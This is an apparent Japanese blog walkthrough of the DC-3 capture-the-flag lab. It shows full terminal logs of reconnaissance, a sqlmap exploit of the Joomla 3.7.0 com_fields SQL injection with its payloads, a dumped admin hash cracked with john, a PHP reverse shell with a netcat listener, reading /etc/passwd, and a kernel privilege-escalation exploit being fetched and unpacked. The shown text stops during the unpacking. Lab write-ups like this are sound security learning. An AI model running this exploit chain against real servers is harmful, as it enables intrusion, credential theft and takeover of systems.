Capture The Frog

かえるぴょこぴょこw

MENU

DC-3 Write up

攻撃者は、kaliを使ってます。

今回の攻撃の流れ
・攻撃される側のIPやウェブディレクトリを調べる
脆弱性をついた攻撃(SQLインジェクション)で、ユーザー名とパスワードを取得
CMSへのログイン
・リバースシェルをつくる
・リバースシェル経由でWEBサーバーにログイン
・権限昇格の脆弱性を探す/攻撃
・root権限にて/rootに侵入し、フラグをゲットする。



まずは、定番の攻撃される側のipとnmapの実施

 Currently scanning: 192.168.10.0/16   |   Screen View: Unique Hosts                                       
                                                                                                           
 6 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 324                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.3.1     30:f7:72:be:b9:b9      1      42  Hon Hai Precision Ind. Co.,Ltd.                         
 192.168.3.2     10:6f:3f:e6:28:40      2     120  BUFFALO.INC                                             
 192.168.3.12    70:bc:10:6a:f6:c1      1      42  Microsoft Corporation                                   
 192.168.3.20    08:00:27:ab:aa:6e      1      60  PCS Systemtechnik GmbH                                  
 192.168.3.16    44:09:b8:8c:f4:72      1      60  Salcomp (Shenzhen) CO., LTD.                            

                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# nmap -sS -A -Pn 192.168.3.20 -p-                                                                  130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-03 12:09 JST
Nmap scan report for 192.168.3.20
Host is up (0.00072s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 08:00:27:AB:AA:6E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms 192.168.3.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds

DC-3がWebサーバーだと分かったので、niktoとdirsearchで公開webディレクトリを探索する。

                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# nikto -h 192.168.3.20           
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.3.20
+ Target Hostname:    192.168.3.20
+ Target Port:        80
+ Start Time:         2021-09-03 12:09:49 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8726 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2021-09-03 12:11:01 (GMT9) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# ls
banner.txt       db            Dockerfile   logs       requirements.txt  static
CHANGELOG.md     default.conf  __init__.py  README.md  setup.cfg         thirdparty
CONTRIBUTORS.md  dirsearch.py  lib          reports    setup.py
                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# python3 dirsearch.py -u http://192.168.3.20/

  _|. _ _  _  _  _ _|_    v0.4.2                                                                            
 (_||| _) (/_(_|| (_| )                                                                                     
                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/dirsearch/reports/192.168.3.20/-_21-09-03_12-11-29.txt

Error Log: /root/dirsearch/logs/errors-21-09-03_12-11-29.log

Target: http://192.168.3.20/

[12:11:29] Starting: 
[12:11:32] 403 -  298B  - /.ht_wsr.txt                                     
[12:11:32] 403 -  301B  - /.htaccess.bak1
[12:11:32] 403 -  301B  - /.htaccess.orig
[12:11:32] 403 -  303B  - /.htaccess.sample
[12:11:32] 403 -  301B  - /.htaccess.save
[12:11:32] 403 -  301B  - /.htaccess_orig                                  
[12:11:32] 403 -  300B  - /.htaccessOLD2
[12:11:32] 403 -  299B  - /.htaccess_sc
[12:11:32] 403 -  302B  - /.htaccess_extra
[12:11:32] 403 -  291B  - /.htm
[12:11:32] 403 -  299B  - /.htaccessOLD
[12:11:32] 403 -  299B  - /.htaccessBAK
[12:11:32] 403 -  292B  - /.html
[12:11:32] 403 -  298B  - /.httr-oauth
[12:11:32] 403 -  297B  - /.htpasswds
[12:11:32] 403 -  301B  - /.htpasswd_test
[12:11:33] 403 -  291B  - /.php                                            
[12:11:33] 403 -  292B  - /.php3                                           
[12:11:37] 200 -   18KB - /LICENSE.txt                                      
[12:11:37] 200 -    4KB - /README.txt                                       
[12:11:47] 301 -  320B  - /administrator  ->  http://192.168.3.20/administrator/
[12:11:47] 403 -  310B  - /administrator/.htaccess                          
[12:11:47] 200 -    2KB - /administrator/includes/                          
[12:11:47] 200 -   31B  - /administrator/cache/
[12:11:47] 200 -    5KB - /administrator/                                   
[12:11:47] 301 -  325B  - /administrator/logs  ->  http://192.168.3.20/administrator/logs/
[12:11:47] 200 -   31B  - /administrator/logs/
[12:11:47] 200 -    5KB - /administrator/index.php                          
[12:11:51] 301 -  310B  - /bin  ->  http://192.168.3.20/bin/                
[12:11:51] 200 -   31B  - /bin/
[12:11:52] 200 -   31B  - /cache/                                           
[12:11:52] 301 -  312B  - /cache  ->  http://192.168.3.20/cache/
[12:11:53] 200 -   31B  - /cli/                                             
[12:11:53] 301 -  317B  - /components  ->  http://192.168.3.20/components/  
[12:11:53] 200 -   31B  - /components/                                      
[12:11:54] 200 -    0B  - /configuration.php                                
[12:12:02] 200 -    3KB - /htaccess.txt                                     
[12:12:03] 301 -  313B  - /images  ->  http://192.168.3.20/images/          
[12:12:03] 200 -   31B  - /images/
[12:12:03] 301 -  315B  - /includes  ->  http://192.168.3.20/includes/      
[12:12:03] 200 -   31B  - /includes/                                        
[12:12:04] 200 -    8KB - /index.php                                        
[12:12:06] 301 -  315B  - /language  ->  http://192.168.3.20/language/      
[12:12:06] 200 -   31B  - /layouts/                                         
[12:12:06] 200 -   31B  - /libraries/                                       
[12:12:06] 301 -  316B  - /libraries  ->  http://192.168.3.20/libraries/    
[12:12:09] 301 -  312B  - /media  ->  http://192.168.3.20/media/            
[12:12:09] 200 -   31B  - /media/                                           
[12:12:10] 301 -  314B  - /modules  ->  http://192.168.3.20/modules/        
[12:12:10] 200 -   31B  - /modules/                                         
[12:12:17] 200 -   31B  - /plugins/                                         
[12:12:17] 301 -  314B  - /plugins  ->  http://192.168.3.20/plugins/        
[12:12:20] 200 -  836B  - /robots.txt.dist                                  
[12:12:22] 403 -  300B  - /server-status                                    
[12:12:22] 403 -  301B  - /server-status/
[12:12:27] 301 -  316B  - /templates  ->  http://192.168.3.20/templates/    
[12:12:27] 200 -   31B  - /templates/
[12:12:27] 200 -    0B  - /templates/beez3/                                 
[12:12:27] 200 -   31B  - /templates/index.html
[12:12:27] 200 -    0B  - /templates/protostar/                             
[12:12:27] 200 -    0B  - /templates/system/                                
[12:12:28] 301 -  310B  - /tmp  ->  http://192.168.3.20/tmp/                
[12:12:29] 200 -   31B  - /tmp/                                             
[12:12:32] 200 -    2KB - /web.config.txt                                   
                                                                             
Task Completed

また、このCMS(Joomla)専用のセキュリティツールがあるのでそれを使って詳細を調べる。


┌──(root💀snowyowl)-[~/dirsearch]
└─# joomscan -u http://192.168.20/
    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.3.20/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing : 
http://192.168.3.20/administrator/components
http://192.168.3.20/administrator/modules
http://192.168.3.20/administrator/templates
http://192.168.3.20/images/banners
                                                                                                            
                                                                                                            
[+] Checking apache info/status files                                                                       
[++] Readable info/status files are not found                                                               
                                                                                                            
[+] admin finder                                                                                            
[++] Admin page : http://192.168.3.20/administrator/                                                        
                                                                                                            
[+] Checking robots.txt existing                                                                            
[++] robots.txt is not found                                                                                
                                                                                                            
[+] Finding common backup files name                                                                        
[++] Backup files are not found                                                                             
                                                                                                            
[+] Finding common log files name                                                                           
[++] error log is not found                                                                                 
                                                                                                            
[+] Checking sensitive config.php.x file                                                                    
[++] Readable config files are not found                                                                    
                                                                                                            
                                                                                                            
Your Report : reports/192.168.3.20/ 


上に実行してきた結果から、Joomlaのバージョンが分かったので、それに関する脆弱性をついたものがないのか調べる。

┌──(root💀snowyowl)-[~]
└─# searchsploit "Joomla 3.7.0"
-------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting             | php/webapps/43488.txt
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

                                                                        
                                                                                                                                        
     

SQLインジェクションが見つかった。 www.exploit-db.com SQLインジェクションのテンプレが書いてあるのでこれを使用する。↓

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

実際に使っていくfullorderingは、ここはこのまま使う。

┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.7#stable}
|_ -| . [']     | .'| . |                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:25:55 /2021-09-03/

[12:25:55] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                                                                
[12:25:55] [INFO] resuming back-end DBMS 'mysql' 
[12:25:55] [INFO] testing connection to the target URL
[12:25:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=pt7u81sacce...hsvbocmn87'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:25:59] [INFO] fetching database names
[12:25:59] [INFO] resumed: 'information_schema'
[12:25:59] [INFO] resumed: 'joomladb'
[12:25:59] [INFO] resumed: 'mysql'
[12:25:59] [INFO] resumed: 'performance_schema'
[12:25:59] [INFO] resumed: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

[12:25:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:25:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'

[*] ending @ 12:25:59 /2021-09-03/

データベースが分かったので、そのなかのjoomladbの中のテーブルを表示する。

┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables                                      
        ___
       __H__                                                                                                
 ___ ___[.]_____ ___ ___  {1.5.7#stable}                                                                    
|_ -| . [.]     | .'| . |                                                                                   
|___|_  [.]_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:28:57 /2021-09-03/

[12:28:57] [INFO] fetched random HTTP User-Agent header value 'Opera/9.00 (X11; Linux i686; U; de)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:28:57] [INFO] resuming back-end DBMS 'mysql' 
[12:28:57] [INFO] testing connection to the target URL
[12:28:58] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=shu32a83a3i...vqs1g25h14'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:29:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:29:00] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

[12:29:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:29:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'

[*] ending @ 12:29:00 /2021-09-03/

usersのテーブルが怪しいので、ここの中にuser名とpasswordのカラムがないかを調べて、あったら表示される。

┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump
        ___
       __H__                                                                                                
 ___ ___[']_____ ___ ___  {1.5.7#stable}                                                                    
|_ -| . [(]     | .'| . |                                                                                   
|___|_  [']_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:37:44 /2021-09-03/

[12:37:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                                                                               
[12:37:44] [INFO] resuming back-end DBMS 'mysql' 
[12:37:44] [INFO] testing connection to the target URL
[12:37:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=8d3l6tqthp3...9qk5fv1qh4'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:37:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:37:46] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

[12:37:46] [INFO] fetching entries of column(s) 'name,password' for table '#__users' in database 'joomladb'
[12:37:46] [INFO] resumed: 'admin'
[12:37:46] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
Database: joomladb
Table: #__users
[1 entry]
+-------+--------------------------------------------------------------+
| name  | password                                                     |
+-------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-------+--------------------------------------------------------------+

[12:37:46] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.3.20/dump/joomladb/#__users.csv'                                                                             
[12:37:46] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:37:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'

[*] ending @ 12:37:46 /2021-09-03/

表示されたので、adminのpasswordをjohnを使って解読する。

$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (?)

これをjohnで解析すると、admin:snoopyと分かる。 そこで、このユーザー名とパスワードを使ってサイトにログインする。 f:id:QWERTYtan:20210903131221p:plain ログインできた リバースシェルをつくる。 index2.phpを新しく作って、これをリバースシェルにする。 リバースシェルの作成、及びペイロード

┌──(root💀snowyowl)-[~]
└─# locate php-reverse-shell.php
/usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

┌──(root💀snowyowl)-[~]
└─# nc -lvp 666

無事にペイロードができたので、少し探索してみようと思う。 /etc/passwdにパスワードがハッシュ値で書かれている場合が多いので、まずはここをチェックする。

meterpreter > cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash

しかし、全てnologinとなっていて全く特権昇格の手がかりが見られない。 このサーバーのosバージョンを見てみる

meterpreter > cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"

searchsploitで探すと、Ubuntu 16.04の脆弱性を利用したコードがあった。

┌──(root💀snowyowl)-[~]
└─# searchsploit "Ubuntu 16.04"    
-------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution          | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation             | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-vid | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora  | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/2 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps     | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arb | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metas | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Poi | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Conditi | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out- | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' R | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) P | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privile | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escala | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation    | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Lo | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privile | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zo | linux/local/47169.c
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                          

この中でも、特権昇格に関するコードは、Local Privilege Escalationと書かれているものである。 そのため、今回はlinux/local/39772.txtを使っていく。

www.exploit-db.com

/tmpは、権限が一番下のレベルなのでここにwgetでダウンロードするとうまく行く

$ unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
$ cd 39772
$ ls
crasher.tar
exploit.tar
$ tar -xvf exploit.tar
